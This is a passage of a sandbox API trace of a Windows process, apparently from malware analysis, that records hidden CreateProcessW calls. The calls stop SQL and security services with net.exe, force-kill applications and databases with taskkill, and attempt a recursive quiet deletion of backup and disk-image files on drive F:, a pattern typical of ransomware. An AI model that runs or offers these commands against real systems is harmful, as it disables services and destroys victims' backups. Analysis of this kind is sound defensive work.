dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x50c, hStdError=0x0), lpProcessInformation=0x2275274 | out: lpCommandLine="\"net.exe\" stop ShMonitor /y", lpProcessInformation=0x2275274*(hProcess=0x560, hThread=0x5a0, dwProcessId=0x150, dwThreadId=0xa90)) returned 1 [0142.175] CloseHandle (hObject=0x50c) returned 1 [0142.175] GetFileType (hFile=0x590) returned 0x3 [0142.176] CloseHandle (hObject=0x5a0) returned 1 [0142.881] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0142.881] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x50c, hWritePipe=0x5a6ef64*=0x4b0) returned 1 [0142.881] GetCurrentProcess () returned 0xffffffff [0142.881] GetCurrentProcess () returned 0xffffffff [0142.881] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x448) returned 1 [0142.881] CloseHandle (hObject=0x50c) returned 1 [0142.881] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0142.881] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0142.881] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0142.881] CoTaskMemFree (pv=0x741d20) [0142.881] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2470d00 | out: lpCommandLine="\"net.exe\" stop SQLAgent$PROD /y", lpProcessInformation=0x2470d00*(hProcess=0x5a4, hThread=0x50c, dwProcessId=0x12a4, dwThreadId=0xbcc)) returned 1 [0143.464] CloseHandle (hObject=0x4b0) returned 1 [0143.464] GetFileType (hFile=0x448) returned 0x3 [0143.464] CloseHandle (hObject=0x50c) returned 1 [0144.757] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0144.757] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x50c, hWritePipe=0x5a6ef64*=0x4b0) returned 1 [0144.758] GetCurrentProcess () returned 0xffffffff [0144.758] GetCurrentProcess () returned 0xffffffff [0144.758] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x500) returned 1 [0144.758] CloseHandle (hObject=0x50c) returned 1 [0144.758] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0144.758] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0144.758] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0144.758] CoTaskMemFree (pv=0x741d20) [0144.758] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop Smcinst /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x247edf0 | out: lpCommandLine="\"net.exe\" stop Smcinst /y", lpProcessInformation=0x247edf0*(hProcess=0x464, hThread=0x50c, dwProcessId=0x1174, dwThreadId=0x8d4)) returned 1 [0145.684] CloseHandle (hObject=0x4b0) returned 1 [0145.684] GetFileType (hFile=0x500) returned 0x3 [0145.684] CloseHandle (hObject=0x50c) returned 1 [0145.684] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0145.684] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x50c, hWritePipe=0x5a6ef64*=0x4b0) returned 1 [0145.685] GetCurrentProcess () returned 0xffffffff [0145.685] GetCurrentProcess () returned 0xffffffff [0145.685] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x444) returned 1 [0145.685] CloseHandle (hObject=0x50c) returned 1 [0145.685] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0145.685] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0145.685] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0145.685] CoTaskMemFree (pv=0x741d20) [0145.685] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6ee9c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x252b778 | out: lpCommandLine="\"net.exe\" stop SQLAgent$PROFXENGAGEMENT /y", lpProcessInformation=0x252b778*(hProcess=0x504, hThread=0x50c, dwProcessId=0x844, dwThreadId=0x12d8)) returned 1 [0146.080] CloseHandle (hObject=0x4b0) returned 1 [0146.080] GetFileType (hFile=0x444) returned 0x3 [0146.080] CloseHandle (hObject=0x50c) returned 1 [0146.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.782] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0146.782] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x50c, hWritePipe=0x5a6ef64*=0x4b0) returned 1 [0146.782] GetCurrentProcess () returned 0xffffffff [0146.782] GetCurrentProcess () returned 0xffffffff [0146.782] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3c4) returned 1 [0146.782] CloseHandle (hObject=0x50c) returned 1 [0146.782] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0146.783] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0146.783] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0146.783] CoTaskMemFree (pv=0x741d20) [0146.783] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM synctime.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2498808 | out: lpCommandLine="\"taskkill.exe\" /IM synctime.exe /F", lpProcessInformation=0x2498808*(hProcess=0x588, hThread=0x50c, dwProcessId=0xe90, dwThreadId=0xf98)) returned 1 [0147.268] CloseHandle (hObject=0x4b0) returned 1 [0147.268] GetFileType (hFile=0x3c4) returned 0x3 [0147.268] CloseHandle (hObject=0x50c) returned 1 [0147.931] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.931] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x50c, hWritePipe=0x5a6ef64*=0x4b0) returned 1 [0147.931] GetCurrentProcess () returned 0xffffffff [0147.931] GetCurrentProcess () returned 0xffffffff [0147.931] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x514) returned 1 [0147.932] CloseHandle (hObject=0x50c) returned 1 [0147.932] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.932] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.932] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.932] CoTaskMemFree (pv=0x741d20) [0147.932] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM thebat.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x24a3fc8 | out: lpCommandLine="\"taskkill.exe\" /IM thebat.exe /F", lpProcessInformation=0x24a3fc8*(hProcess=0x4d0, hThread=0x50c, dwProcessId=0xc54, dwThreadId=0x11bc)) returned 1 [0147.937] CloseHandle (hObject=0x4b0) returned 1 [0147.937] GetFileType (hFile=0x514) returned 0x3 [0147.937] CloseHandle (hObject=0x50c) returned 1 [0149.553] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.553] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4b0, hWritePipe=0x5a6ef64*=0x504) returned 1 [0149.553] GetCurrentProcess () returned 0xffffffff [0149.553] GetCurrentProcess () returned 0xffffffff [0149.553] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4d0) returned 1 [0149.553] CloseHandle (hObject=0x4b0) returned 1 [0149.553] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.553] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.553] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.553] CoTaskMemFree (pv=0x741d20) [0149.553] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM steam.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2276a30 | out: lpCommandLine="\"taskkill.exe\" /IM steam.exe /F", lpProcessInformation=0x2276a30*(hProcess=0x554, hThread=0x4b0, dwProcessId=0x1320, dwThreadId=0x10f4)) returned 1 [0149.560] CloseHandle (hObject=0x504) returned 1 [0149.560] GetFileType (hFile=0x4d0) returned 0x3 [0149.560] CloseHandle (hObject=0x4b0) returned 1 [0150.822] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.822] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x504, hWritePipe=0x5a6ef64*=0x558) returned 1 [0150.822] GetCurrentProcess () returned 0xffffffff [0150.822] GetCurrentProcess () returned 0xffffffff [0150.822] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x594) returned 1 [0150.822] CloseHandle (hObject=0x504) returned 1 [0150.822] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.822] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.822] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.822] CoTaskMemFree (pv=0x741d20) [0150.822] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM winword.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x251b578 | out: lpCommandLine="\"taskkill.exe\" /IM winword.exe /F", lpProcessInformation=0x251b578*(hProcess=0x58c, hThread=0x504, dwProcessId=0x834, dwThreadId=0x13d4)) returned 1 [0151.038] CloseHandle (hObject=0x558) returned 1 [0151.038] GetFileType (hFile=0x594) returned 0x3 [0151.038] CloseHandle (hObject=0x504) returned 1 [0151.560] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.561] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x504, hWritePipe=0x5a6ef64*=0x558) returned 1 [0151.561] GetCurrentProcess () returned 0xffffffff [0151.561] GetCurrentProcess () returned 0xffffffff [0151.561] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x5d8) returned 1 [0151.561] CloseHandle (hObject=0x504) returned 1 [0151.561] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.561] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.561] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.561] CoTaskMemFree (pv=0x741d20) [0151.561] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mysqld-nt.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x2595f94 | out: lpCommandLine="\"taskkill.exe\" /IM mysqld-nt.exe /F", lpProcessInformation=0x2595f94*(hProcess=0x5d4, hThread=0x504, dwProcessId=0x1090, dwThreadId=0x1208)) returned 1 [0151.937] CloseHandle (hObject=0x558) returned 1 [0151.937] GetFileType (hFile=0x5d8) returned 0x3 [0151.937] CloseHandle (hObject=0x504) returned 1 [0152.272] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0152.272] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x558, hWritePipe=0x5a6ef64*=0x5e4) returned 1 [0152.273] GetCurrentProcess () returned 0xffffffff [0152.273] GetCurrentProcess () returned 0xffffffff [0152.273] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4e0) returned 1 [0152.273] CloseHandle (hObject=0x558) returned 1 [0152.273] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0152.273] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0152.273] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0152.273] CoTaskMemFree (pv=0x741d20) [0152.273] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM wordpad.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5e4, hStdError=0x0), lpProcessInformation=0x22b109c | out: lpCommandLine="\"taskkill.exe\" /IM wordpad.exe /F", lpProcessInformation=0x22b109c*(hProcess=0x5a0, hThread=0x558, dwProcessId=0xc48, dwThreadId=0xf54)) returned 1 [0153.232] CloseHandle (hObject=0x5e4) returned 1 [0153.232] GetFileType (hFile=0x4e0) returned 0x3 [0153.232] CloseHandle (hObject=0x558) returned 1 [0153.232] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0153.232] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x558, hWritePipe=0x5a6ef64*=0x5e4) returned 1 [0153.232] GetCurrentProcess () returned 0xffffffff [0153.232] GetCurrentProcess () returned 0xffffffff [0153.232] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x50c) returned 1 [0153.232] CloseHandle (hObject=0x558) returned 1 [0153.233] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0153.233] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0153.233] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0153.233] CoTaskMemFree (pv=0x741d20) [0153.233] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mysqld-opt.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5e4, hStdError=0x0), lpProcessInformation=0x2563df8 | out: lpCommandLine="\"taskkill.exe\" /IM mysqld-opt.exe /F", lpProcessInformation=0x2563df8*(hProcess=0x4f4, hThread=0x558, dwProcessId=0xf6c, dwThreadId=0xc84)) returned 1 [0153.584] CloseHandle (hObject=0x5e4) returned 1 [0153.584] GetFileType (hFile=0x50c) returned 0x3 [0153.584] CloseHandle (hObject=0x558) returned 1 [0153.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.028] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.986] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.986] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x5dc, hWritePipe=0x5a6ef64*=0x558) returned 1 [0155.986] GetCurrentProcess () returned 0xffffffff [0155.986] GetCurrentProcess () returned 0xffffffff [0155.986] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x418) returned 1 [0155.986] CloseHandle (hObject=0x5dc) returned 1 [0155.986] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.986] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0155.986] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0155.986] CoTaskMemFree (pv=0x741d20) [0155.986] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6ee04*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x256f190 | out: lpCommandLine="\"del.exe\" /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk", lpProcessInformation=0x256f190*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0155.987] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x5a6ed38, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.988] CloseHandle (hObject=0x558) returned 1 [0155.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.556] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) 